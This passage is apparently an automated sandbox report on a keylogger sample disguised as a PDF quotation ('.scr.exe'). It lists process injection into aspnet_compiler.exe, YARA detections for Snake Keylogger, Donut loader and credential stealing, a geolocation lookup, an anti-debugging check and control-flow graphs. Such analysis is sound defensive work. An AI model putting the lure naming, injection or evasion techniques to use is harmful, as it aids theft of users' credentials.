                                                                Content-Type: text/xml
                                                                Content-Length: 361
                                                                Connection: close
                                                                Cache-Control: max-age=31536000
                                                                CF-Cache-Status: HIT
                                                                Age: 154870
                                                                Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                Accept-Ranges: bytes
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aVt6CDXXIvx0jk66ELW%2Fu8NBbLVMHa895fQ5470pK1tcsYnygds9N9V%2FBAzR9kEy2SQ8TKtp00jKrlOXcebotLckflnM8yGh0T7vTZ7hQV0Gn4BIdbluRwYRY%2FgA8Yf%2F%2B%2BY5Bt92"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8e6092057970426b-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1627&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1768625&cwnd=232&unsent_bytes=0&cid=e5f65f994faf4d0d&ts=468&x=0"
                                                                2024-11-21 12:09:21 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                Click to jump to process

                                                                Click to jump to process

                                                                Click to dive into process behavior distribution

                                                                Click to jump to process

                                                                Target ID:0
                                                                Start time:07:07:57
                                                                Start date:21/11/2024
                                                                Path:C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe"
                                                                Imagebase:0x1195ccb0000
                                                                File size:413'696 bytes
                                                                MD5 hash:C62FB9BD9189ED019DB81D5CEC1EE11B
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.2638636004.000001195F083000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2638636004.000001195ECF0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2653712164.00000119775B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2650304979.000001196ECC7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.2650304979.000001196ECC7000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:4
                                                                Start time:07:08:55
                                                                Start date:21/11/2024
                                                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe"
                                                                Imagebase:0x1f59dca0000
                                                                File size:55'824 bytes
                                                                MD5 hash:DF5419B32657D2896514B6A1D041FE08
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.3322004150.000001F5AF989000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.3322004150.000001F5AF989000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000004.00000002.3322004150.000001F5AF989000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000004.00000002.3322004150.000001F5AF989000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.3319881103.000001F59FBCB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000004.00000002.3318682835.000001F59DD20000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.3319624871.000001F59E080000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.3319624871.000001F59E080000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000004.00000002.3319624871.000001F59E080000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000004.00000002.3319624871.000001F59E080000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000004.00000002.3319624871.000001F59E080000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000004.00000002.3319624871.000001F59E080000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.3319881103.000001F59F981000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:moderate
                                                                Has exited:false

                                                                Target ID:5
                                                                Start time:07:08:55
                                                                Start date:21/11/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6d64d0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:false

                                                                Reset < >

                                                                  Execution Graph

                                                                  Execution Coverage:6.9%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:100%
                                                                  Total number of Nodes:3
                                                                  Total number of Limit Nodes:0
                                                                  execution_graph 39471 7ff8491619f5 39472 7ff849161a0f CheckRemoteDebuggerPresent 39471->39472 39474 7ff849161ab3 39472->39474
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2655959558.00007FF849140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849140000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff849140000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ',_H$C,_I
                                                                  • API String ID: 0-641918142
                                                                  • Opcode ID: ce775b52fc9262a67bbd9586927693ab2a09b3091bf2d787a88cda5eecd4994b
                                                                  • Instruction ID: 92927e674c8293a8af01c8dd73558f1b85153ba1955864de273f4367a372861d
                                                                  • Opcode Fuzzy Hash: ce775b52fc9262a67bbd9586927693ab2a09b3091bf2d787a88cda5eecd4994b
                                                                  • Instruction Fuzzy Hash: 5EE2C770A1CA49CFDB98EF28C484BA977F1FF59340F1441A9D44DDB296CA39E885CB41

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 838 7ff8491619f5-7ff849161ab1 CheckRemoteDebuggerPresent 843 7ff849161ab9-7ff849161afd 838->843 844 7ff849161ab3 838->844 844->843
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2655959558.00007FF849140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849140000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff849140000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd
                                                                  Similarity
                                                                  • API ID: CheckDebuggerPresentRemote
                                                                  • String ID:
                                                                  • API String ID: 3662101638-0
                                                                  • Opcode ID: afc77d2cc1421025c8950d8002562a00ff64ae7da42eefd620493f6e17f711ae
                                                                  • Instruction ID: f157c5da2edbc52400fdc92c43aef586bdee83ffe38eccac45af3b5efd2baf4d
                                                                  • Opcode Fuzzy Hash: afc77d2cc1421025c8950d8002562a00ff64ae7da42eefd620493f6e17f711ae
                                                                  • Instruction Fuzzy Hash: 1731E57180C7588FDB29DF58984A6F97BE1FF95311F04462FD08AD3182DB7868458B91
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2655959558.00007FF849140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849140000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff849140000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 89d55c199f2d8a021d4d5c6749fb2477143bdae92bd1af121a35fe77ca61e42e
                                                                  • Instruction ID: d8e8a4c821ef6379186f4bf8d40321d0f126d9f73ed6324f95e18256a69cf429
                                                                  • Opcode Fuzzy Hash: 89d55c199f2d8a021d4d5c6749fb2477143bdae92bd1af121a35fe77ca61e42e
                                                                  • Instruction Fuzzy Hash: 09820730A1CB8A4FE769AF2884542B5B7E1FF543A0F55457ED04BC76D6DE3CA8428B40

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 2428 7ff849148029-7ff849148084 2431 7ff849148086-7ff8491480e0 call 7ff849147d38 2428->2431 2432 7ff8491480e5-7ff8491480e9 2428->2432 2474 7ff8491486d4-7ff8491486e7 2431->2474 2433 7ff8491480eb-7ff8491480f8 call 7ff849145410 2432->2433 2434 7ff8491480fa 2432->2434 2437 7ff8491480fc-7ff849148105 2433->2437 2434->2437 2439 7ff84914823a-7ff84914823f 2437->2439 2440 7ff84914810b-7ff849148110 2437->2440 2445 7ff8491482a5-7ff8491482a9 2439->2445 2446 7ff849148241-7ff849148253 call 7ff849142a60 2439->2446 2442 7ff8491486e8-7ff84914871a 2440->2442 2443 7ff849148116-7ff84914811b 2440->2443 2455 7ff849148721-7ff849148753 2442->2455 2448 7ff84914811d-7ff849148129 2443->2448 2449 7ff84914812f-7ff849148145 call 7ff849145060 2443->2449 2450 7ff8491482ab-7ff8491482be call 7ff849141e00 2445->2450 2451 7ff8491482f1-7ff84914831c 2445->2451 2461 7ff849148258-7ff84914825f 2446->2461 2448->2449 2448->2455 2463 7ff84914814a-7ff849148235 call 7ff849145d90 call 7ff849147b40 2449->2463 2470 7ff84914875a-7ff849148763 2450->2470 2471 7ff8491482c4-7ff8491482dc 2450->2471 2480 7ff84914831e-7ff849148329 2451->2480 2481 7ff84914832b 2451->2481 2455->2470 2465 7ff849148255-7ff849148256 2461->2465 2466 7ff849148261-7ff849148282 call 7ff849147ec0 2461->2466 2463->2474 2465->2461 2487 7ff849148287-7ff8491482a0 call 7ff849147cc0 2466->2487 2479 7ff84914877d-7ff8491487cc 2470->2479 2507 7ff8491487d3-7ff849148810 2479->2507 2486 7ff84914832d-7ff84914835c 2480->2486 2481->2486 2498 7ff849148559-7ff84914855a 2486->2498 2499 7ff849148362-7ff849148381 call 7ff849141b60 2486->2499 2487->2474 2503 7ff849148561 2498->2503 2508 7ff849148387-7ff84914839e call 7ff849141b90 2499->2508 2509 7ff849148551-7ff849148554 2499->2509 2505 7ff849148566 2503->2505 2510 7ff84914856a-7ff84914856c 2505->2510 2540 7ff84914881b-7ff849148826 2507->2540 2541 7ff849148812-7ff849148819 2507->2541 2528 7ff8491483b7-7ff8491483c1 2508->2528 2529 7ff8491483a0-7ff8491483b6 2508->2529 2512 7ff849148456-7ff849148458 2509->2512 2515 7ff84914856e-7ff849148571 2510->2515 2516 7ff849148573-7ff849148578 2510->2516 2513 7ff84914850d-7ff849148516 2512->2513 2514 7ff84914845e-7ff84914847d call 7ff849141b60 2512->2514 2524 7ff84914860c-7ff849148611 2513->2524 2525 7ff84914851c-7ff849148521 2513->2525 2514->2513 2544 7ff849148483-7ff84914849a call 7ff849141b90 2514->2544 2521 7ff8491485ab-7ff8491485ae 2515->2521 2522 7ff84914857a-7ff84914859c call 7ff849140180 2516->2522 2523 7ff8491485a3-7ff8491485a8 2516->2523 2542 7ff8491485ff-7ff849148606 2521->2542 2543 7ff8491485b0-7ff8491485b3 2521->2543 2522->2523 2523->2521 2535 7ff84914865f-7ff8491486cb call 7ff849147b40 2524->2535 2536 7ff849148613-7ff849148658 2524->2536 2537 7ff849148568 2525->2537 2538 7ff849148523-7ff84914852c 2525->2538 2531 7ff8491483f2-7ff8491483f9 2528->2531 2532 7ff8491483c3-7ff8491483ec 2528->2532 2529->2528 2531->2507 2549 7ff8491483ff-7ff849148416 2531->2549 2532->2479 2532->2531 2563 7ff8491486d0-7ff8491486d1 2535->2563 2536->2535 2537->2510 2538->2503 2551 7ff84914852e-7ff849148533 2538->2551 2541->2540 2552 7ff849148827-7ff849148878 2541->2552 2542->2524 2542->2525 2547 7ff8491485dd-7ff8491485fb 2543->2547 2548 7ff8491485b5-7ff8491485d5 2543->2548 2570 7ff84914849c-7ff8491484b1 2544->2570 2571 7ff8491484b3-7ff8491484ba 2544->2571 2547->2542 2548->2547 2559 7ff849148418-7ff84914841b call 7ff849140268 2549->2559 2560 7ff849148437-7ff849148450 call 7ff849141b60 2549->2560 2551->2503 2562 7ff849148535-7ff84914853a 2551->2562 2572 7ff849148420-7ff849148435 2559->2572 2560->2512 2583 7ff849148549-7ff84914854c 2560->2583 2562->2503 2568 7ff84914853c-7ff849148547 2562->2568 2563->2474 2568->2505 2570->2571 2571->2507 2576 7ff8491484c0-7ff8491484d6 2571->2576 2572->2560 2581 7ff8491484ef-7ff849148507 call 7ff849141b60 2576->2581 2582 7ff8491484d8-7ff8491484d9 2576->2582 2581->2513 2581->2544 2586 7ff8491484e0-7ff8491484e8 2582->2586 2583->2508 2586->2581
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2655959558.00007FF849140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849140000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff849140000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e23ab6c20bb2a027d478d6abf75b296dc18322d0bae0896856833762eed25f27
                                                                  • Instruction ID: dcb79a877952e764922bc83c6fbdd0fa7ef05f86d11f93308d79f548adcec66d
                                                                  • Opcode Fuzzy Hash: e23ab6c20bb2a027d478d6abf75b296dc18322d0bae0896856833762eed25f27
                                                                  • Instruction Fuzzy Hash: 6A52A331A1CA8A8FE7A8EF288455675B7E1FF58350F5406BDC44EC7686DF38B8418B81
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2655959558.00007FF849140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849140000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff849140000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5a08721177566573398f28e6cd00c8642faefdca1a107ebf43f41e6d5a9789c5
                                                                  • Instruction ID: df8b5dbf6f6b0181ca8f84ede79f133dca619a75f88187d96414a6c706636a41
                                                                  • Opcode Fuzzy Hash: 5a08721177566573398f28e6cd00c8642faefdca1a107ebf43f41e6d5a9789c5
                                                                  • Instruction Fuzzy Hash: 70427030B1C9498FDB98EB2CD458B7977E1EF59351F1501BAE44EC72A2DE28EC428B41
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2655959558.00007FF849140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849140000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff849140000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 98cf229fb64fd6fd7d58a27effc0a2fbbddbdca304876d90b2917adbfa423f3e
                                                                  • Instruction ID: 98620661fd331cce28ba122aa1c13380c5e8d41ad6a142c5e70cf4e64232997b
                                                                  • Opcode Fuzzy Hash: 98cf229fb64fd6fd7d58a27effc0a2fbbddbdca304876d90b2917adbfa423f3e
                                                                  • Instruction Fuzzy Hash: C742C130A1CB898FE769EF28C445575B7E1FF99350F1409BDD48AC7296DA38E882CB41
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2655959558.00007FF849140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849140000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff849140000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ce463bb0ea76742e56eb428043e91a283d84f7a692cf3be627d0fcb25b381d12
                                                                  • Instruction ID: 799ae3f109b200b93fa46011e5c8017736c653c27faad976880756e3738f783b
                                                                  • Opcode Fuzzy Hash: ce463bb0ea76742e56eb428043e91a283d84f7a692cf3be627d0fcb25b381d12
                                                                  • Instruction Fuzzy Hash: 20321930A1DA868FE769EF28848567577D1FF99780F1405BDD48EC7296DE2CBC028B81
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2655959558.00007FF849140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849140000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff849140000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 41d0fec75d08b56e54cdb095288d25ac9680444b5fe584c5c04dffb4b7f32c14
                                                                  • Instruction ID: f81a550918372ec3db86288956264210e94f10cfcf9d79436cbb96c61f10fdaf
                                                                  • Opcode Fuzzy Hash: 41d0fec75d08b56e54cdb095288d25ac9680444b5fe584c5c04dffb4b7f32c14
                                                                  • Instruction Fuzzy Hash: 44F1A63090CA8D8FEBA9EF28C8557E977E1FF54350F04426AD84EC7295DB389945CB81
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2655959558.00007FF849140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849140000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff849140000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1b2c705561d10e97e5b469097eaaa893b1aef5000e66ce18e6f4bbba1280e1f1
                                                                  • Instruction ID: 8feff6e2e91eb5b9622df7f413a64e141add0d60dddfe4baa14262849dca7ef5
                                                                  • Opcode Fuzzy Hash: 1b2c705561d10e97e5b469097eaaa893b1aef5000e66ce18e6f4bbba1280e1f1
                                                                  • Instruction Fuzzy Hash: B5E1B43090CA8E8FEBA9EF28C8557E977D1FB54350F04826ED84DC7291DE78A8458B81

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 379 7ff848f40328-7ff848f40336 381 7ff848f40338-7ff848f40344 379->381 382 7ff848f40395-7ff848f40396 379->382 387 7ff848f40389-7ff848f40394 381->387 388 7ff848f40346 381->388 383 7ff848f40397-7ff848f403a4 382->383 384 7ff848f403f5 382->384 394 7ff848f403a5-7ff848f403d4 383->394 389 7ff848f40467 384->389 390 7ff848f403f6 384->390 387->382 388->394 395 7ff848f40348-7ff848f40376 388->395 396 7ff848f4046a-7ff848f40474 389->396 392 7ff848f403f7-7ff848f40426 390->392 393 7ff848f40455-7ff848f40459 390->393 415 7ff848f40435 392->415 406 7ff848f4045b-7ff848f40465 393->406 407 7ff848f40436 393->407 421 7ff848f403d5-7ff848f403d6 394->421 420 7ff848f40378-7ff848f40388 395->420 395->421 397 7ff848f404d2 396->397 398 7ff848f40476 396->398 403 7ff848f40478-7ff848f4048a 398->403 404 7ff848f404d5-7ff848f404d9 398->404 423 7ff848f4048c-7ff848f404a2 403->423 424 7ff848f404d4 403->424 412 7ff848f404db-7ff848f404eb 404->412 413 7ff848f4051a 404->413 406->389 409 7ff848f40437-7ff848f40439 407->409 409->393 434 7ff848f404ec-7ff848f404f0 412->434 416 7ff848f4051c-7ff848f4053b 413->416 417 7ff848f40564-7ff848f4056b 413->417 415->407 415->409 436 7ff848f4053c-7ff848f40541 416->436 420->387 421->415 428 7ff848f403d8-7ff848f403f4 421->428 423->434 441 7ff848f404a4-7ff848f404c2 423->441 424->404 428->384 428->396 438 7ff848f40553-7ff848f40562 434->438 439 7ff848f404f2 434->439 443 7ff848f40543-7ff848f40551 436->443 444 7ff848f40582-7ff848f405ae 436->444 438->417 439->436 442 7ff848f404f4-7ff848f404f9 439->442 443->438 456 7ff848f4060c-7ff848f40641 444->456 457 7ff848f405b0-7ff848f4060b 444->457 468 7ff848f40643-7ff848f4067f 456->468 469 7ff848f40681-7ff848f4071e 456->469 457->456 468->469 481 7ff848f4077c 469->481 482 7ff848f40720-7ff848f4073e 469->482 483 7ff848f4077e 481->483 484 7ff848f40793-7ff848f40799 481->484 493 7ff848f4079c-7ff848f4079e 482->493 494 7ff848f40740-7ff848f4074c 482->494 486 7ff848f407dc-7ff848f407de 483->486 487 7ff848f40780-7ff848f4078e 483->487 484->493 491 7ff848f4083c-7ff848f40849 486->491 492 7ff848f407e0-7ff848f407e9 486->492 496 7ff848f407ec-7ff848f407ee 487->496 497 7ff848f40790-7ff848f40791 487->497 503 7ff848f4084c-7ff848f4086d 491->503 492->496 499 7ff848f407fc-7ff848f4080b 493->499 500 7ff848f407a0-7ff848f407a9 493->500 506 7ff848f4074e 494->506 507 7ff848f40761-7ff848f40779 494->507 496->503 504 7ff848f407f0-7ff848f407f6 496->504 497->484 499->491 510 7ff848f407ac-7ff848f407bb 500->510 519 7ff848f408eb-7ff848f408f5 call 7ff848f404a8 503->519 520 7ff848f4086f-7ff848f4087c 503->520 504->499 506->510 511 7ff848f40750-7ff848f4075e 506->511 507->481 517 7ff848f407bc-7ff848f407d9 510->517 511->517 518 7ff848f40760 511->518 517->486 518->507 530 7ff848f408f6 519->530 524 7ff848f408f8-7ff848f40906 520->524 525 7ff848f4087e 520->525 537 7ff848f4090c-7ff848f4091d 524->537 528 7ff848f408dc 525->528 529 7ff848f40880-7ff848f40896 525->529 534 7ff848f408e2 528->534 529->530 540 7ff848f40898 529->540 530->524 538 7ff848f4092c 534->538 539 7ff848f408e4-7ff848f408ea 534->539 541 7ff848f4091f-7ff848f4092a 537->541 542 7ff848f4097e-7ff848f40983 537->542 545 7ff848f4092e-7ff848f40963 538->545 539->519 540->534 544 7ff848f4089a-7ff848f408a3 540->544 541->538 547 7ff848f408a4-7ff848f408a6 call 7ff848f40490 544->547 549 7ff848f40969-7ff848f4097c 545->549 550 7ff848f408ab-7ff848f408b0 547->550 549->541 549->542
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2654607630.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff848f40000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Jp]$L_^
                                                                  • API String ID: 0-1167134851
                                                                  • Opcode ID: b3f821751130049b693d356dc84e520f19dd817e93da7c69b731e2bcee1deb0a
                                                                  • Instruction ID: e90cdc5404ada9ae406b358761127d5232b0efbd607e69c3a3bb38b45ee049be
                                                                  • Opcode Fuzzy Hash: b3f821751130049b693d356dc84e520f19dd817e93da7c69b731e2bcee1deb0a
                                                                  • Instruction Fuzzy Hash: 6E22B672D1EAC25FF395B77828151B57FE0FFB2A90F1840BBC4889B0D7DA185806875A

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 640 7ff849093abd-7ff849093b03 642 7ff849093b05-7ff849093b1d 640->642 643 7ff849093b1e 640->643 642->643 645 7ff849093b1f-7ff849093b57 642->645 643->645 646 7ff849093b59 645->646 647 7ff849093b5e-7ff849093b76 645->647 646->647 649 7ff84909402c-7ff849094044 647->649 651 7ff84909404a-7ff84909404f 649->651 652 7ff849093b7b-7ff849093b7f 649->652 653 7ff849094051-7ff84909408b 651->653 654 7ff84909408e-7ff8490940a9 651->654 655 7ff849093b81-7ff849093bee 652->655 656 7ff849093b84-7ff849093b89 652->656 653->654 662 7ff849093bf0-7ff849093c73 655->662 663 7ff849093bf3-7ff849093bf8 655->663 660 7ff849093b8b-7ff849093b96 656->660 661 7ff849093bbc-7ff849093bc0 656->661 660->661 665 7ff849093bc7-7ff849093be5 661->665 670 7ff849093c75-7ff849093ce2 662->670 671 7ff849093c78-7ff849093c7d 662->671 668 7ff849093bfa-7ff849093c05 663->668 669 7ff849093c2b-7ff849093c2f 663->669 665->649 668->669 678 7ff849093c36-7ff849093c3f 669->678 679 7ff849093ce4-7ff849093d4b 670->679 680 7ff849093ce7-7ff849093cec 670->680 675 7ff849093cb0-7ff849093cd9 671->675 676 7ff849093c7f-7ff849093cad 671->676 675->649 676->675 682 7ff849093c47-7ff849093c58 678->682 689 7ff849093d53-7ff849093d58 679->689 690 7ff849093d4d-7ff849093dd4 679->690 684 7ff849093cee-7ff849093d1c 680->684 685 7ff849093d1f-7ff849093d23 680->685 687 7ff849093c69-7ff849093c6a 682->687 688 7ff849093c5a-7ff849093c62 682->688 684->685 697 7ff849093d2a-7ff849093d42 685->697 687->649 688->687 695 7ff849093d97-7ff849093d9b 689->695 696 7ff849093d5a-7ff849093d63 689->696 700 7ff849093dd6-7ff849093e5d 690->700 701 7ff849093ddc-7ff849093de1 690->701 703 7ff849093da2-7ff849093db9 695->703 696->695 697->649 711 7ff849093e65-7ff849093e6a 700->711 712 7ff849093e5f-7ff849093ee6 700->712 705 7ff849093e20-7ff849093e42 701->705 706 7ff849093de3-7ff849093e1d 701->706 708 7ff849093dca-7ff849093dcb 703->708 709 7ff849093dbb-7ff849093dc3 703->709 719 7ff849093e53-7ff849093e54 705->719 720 7ff849093e44-7ff849093e4c 705->720 706->705 708->649 709->708 716 7ff849093ea9-7ff849093ecb 711->716 717 7ff849093e6c-7ff849093ea6 711->717 721 7ff849093ee8-7ff849093f6f 712->721 722 7ff849093eee-7ff849093ef3 712->722 730 7ff849093edc-7ff849093edd 716->730 731 7ff849093ecd-7ff849093ed5 716->731 717->716 719->649 720->719 732 7ff849093f71-7ff849093fe2 721->732 733 7ff849093f74-7ff849093f79 721->733 726 7ff849093f32-7ff849093f54 722->726 727 7ff849093ef5-7ff849093f2f 722->727 740 7ff849093f65-7ff849093f66 726->740 741 7ff849093f56-7ff849093f5e 726->741 727->726 730->649 731->730 742 7ff849094021-7ff849094025 732->742 743 7ff849093fe4-7ff84909401e 732->743 737 7ff849093fb8-7ff849093fdb 733->737 738 7ff849093f7b-7ff849093fb5 733->738 737->649 738->737 740->649 741->740 742->649 743->742
                                                                  Strings
                                                                  Memory Dump Source
